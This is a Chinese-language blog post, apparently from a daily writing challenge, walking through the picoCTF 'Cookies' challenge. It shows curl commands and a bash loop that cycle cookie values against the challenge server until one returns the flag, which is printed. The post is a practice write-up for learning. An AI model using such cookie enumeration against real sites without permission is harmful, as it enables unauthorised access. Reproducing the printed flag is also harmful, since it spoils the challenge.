哈囉各位安安
今天是連續發文的第10天
我沒囤文,每天當下產文完成1/3了 灑花~
ㄟ我會不會太早慶祝
不要烏鴉嘴,我一定會成功完賽的
要是當老鼠屎一萬就飛了 QQ
讀者可以留言跟我互動,告訴我你讀完的感覺
會不會寫不夠詳細,怎樣可以更好都歡迎跟我回饋~

我們開工吧!今天是第10天,我想來個小複習
所以今天解的題型概念會是前幾天解過的Cookie
GO ~

Cookies

Who doesn't love cookies? Try to figure out the best one. http://mercury.picoctf.net:64944/
No Hints

我們上面連結點下去,會出現這畫面

我開始亂輸入,都會顯示無效登入
snickerdoodle
右鍵檢視原始碼

<div class="col-xs-12 col-sm-12 col-md-12">
				<h3>Welcome to my cookie search page. See how much I like different kinds of cookies!</h3>
			</div>

檢查一下從服務器獲得的Cookie

┌──(user@kali)-[/media/sf_CTFs/pico/Cookies]
└─$ curl -s http://mercury.picoctf.net:27177/ -I | grep Cookie
Set-Cookie: name=-1; Path=/

如果我們試試更改不同的Cookie名字會怎樣?

┌──(user@kali)-[/media/sf_CTFs/pico/Cookies]
└─$ curl -s http://mercury.picoctf.net:27177/ -H "Cookie: name=0;" -L | grep -i Cookie
    <title>Cookies</title>
            <h3 class="text-muted">Cookies</h3>
          <!-- <strong>Title</strong> --> That is a cookie! Not very special though...
            <p style="text-align:center; font-size:30px;"><b>I love snickerdoodle cookies!</b></p>

我們用暴力解來搜尋那特別的Cookie數字吧

┌──(user@kali)-[/media/sf_CTFs/pico/Cookies]
└─$ for i in {1..20}; do
for>     contents=$(curl -s http://mercury.picoctf.net:27177/ -H "Cookie: name=$i; Path=/" -L)
for>     if ! echo "$contents" | grep -q "Not very special"; then
for then>         echo "Cookie #$i is special"
for then>         echo $contents | grep "pico"
for then>         break
for then>     fi
for> done
Cookie #18 is special
            <p style="text-align:center; font-size:30px;"><b>Flag</b>: <code>picoCTF{3v3ry1_l0v3s_c00k135_064663be}</code></p>

Flag出來囉~
flag: picoCTF{3v3ry1_l0v3s_c00k135_064663be}
解完收工

明天又是快樂星期六,令人期待的滑板課

大家晚安